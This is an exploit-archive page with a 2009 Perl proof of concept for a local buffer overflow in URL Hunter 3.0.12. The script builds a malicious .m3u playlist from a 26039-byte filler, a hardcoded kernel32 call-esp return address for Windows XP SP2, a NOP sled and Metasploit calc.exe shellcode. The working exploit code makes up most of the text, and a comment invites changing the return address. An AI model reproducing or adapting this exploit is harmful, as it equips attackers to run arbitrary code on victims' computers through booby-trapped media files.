Home / os / win10

urlhunter-overflow.txt

Posted on 29 August 2009

=============================================================
URL Hunter Version 3.0.12(.M3u) Local Buffer Overflow Exploit
=============================================================

1-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=0
0     _                   __           __       __                     1
1   /'             __  /'__`        / \__  /'__`                   0
0  /\_,     ___   /\_/\_      ___  ,_/ /   _ ___           1
1  /_/  /' _ ` / /_/_\_<_  /'___  /    /`'__          0
0       / /    /   / \__/  \_  \_   /           1
1       \_ \_ \_\_   \____/ \____\ \__\ \____/ \_           0
0       /_//_//_/ \_ /___/  /____/ /__/ /___/  /_/           1
1                   \____/ >> Exploit database separated by exploit   0
0                   /___/          type (local, remote, DoS, etc.)    1
1                                                                      0
-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-1

#[+] Discovered By   : Inj3ct0r
#[+] Site            : Inj3ct0r.com
#[+] Support e-mail  : submit[at]inj3ct0r.com
#[+] Visit : inj3ct0r.com , inj3ct0r.org , inj3ct0r.net


#!/usr/bin/perl
#URL Hunter Version 3.0.12(.M3u) Local Buffer Overflow Exploit
#download : http://www.rm-to-mp3.net/downloads/urlhuntersetup.exe

my $crash= "A" x 26039;

#created by opt!x hacker

####run software clic on stop to be start and get m3u file into the sof and
boom calc executed####
#you can change the ret adress as you need
#this exploit work wit me without any header

# shellcode executes calc.exe from metasploit project Size=160 --
Encoder=PexFnstenvSub
my $shellcode=

"x31xc9x83xe9xdexd9xeexd9x74x24xf4x5bx81x73x13x08".

"x99x23x82x83xebxfcxe2xf4xf4x71x67x82x08x99xa8xc7".

"x34x12x5fx87x70x98xccx09x47x81xa8xddx28x98xc8xcb".

"x83xadxa8x83xe6xa8xe3x1bxa4x1dxe3xf6x0fx58xe9x8f".

"x09x5bxc8x76x33xcdx07x86x7dx7cxa8xddx2cx98xc8xe4".

"x83x95x68x09x57x85x22x69x83x85xa8x83xe3x10x7fxa6".

"x0cx5ax12x42x6cx12x63xb2x8dx59x5bx8ex83xd9x2fx09".

"x78x85x8ex09x60x91xc8x8bx83x19x93x82x08x99xa8xea".

"x34xc6x12x74x68xcfxaax7ax8bx59x58xd2x60x69xa9x86".

"x57xf1xbbx7cx82x97x74x7dxefxfax42xeex6bx99x23x82";


my $ret = "x68xD5x85x7C"; # 0x7C85D568 call esp from kernel32.dll
in windows xp pro SP2 fr
my $nop = "x90" x 10;
open(m3u,">>youssef.m3u");

print m3u $crash.$ret.$nop.$shellcode;
print "[+] Done !! [+]";
close(m3u);

---------------------------------

ThE End =]  Visit my proj3ct  :

http://inj3ct0r.com
http://inj3ct0r.org
http://inj3ct0r.net


# ~  - [ [ : Inj3ct0r : ] ]

 

TOP

Malware :

Exploits :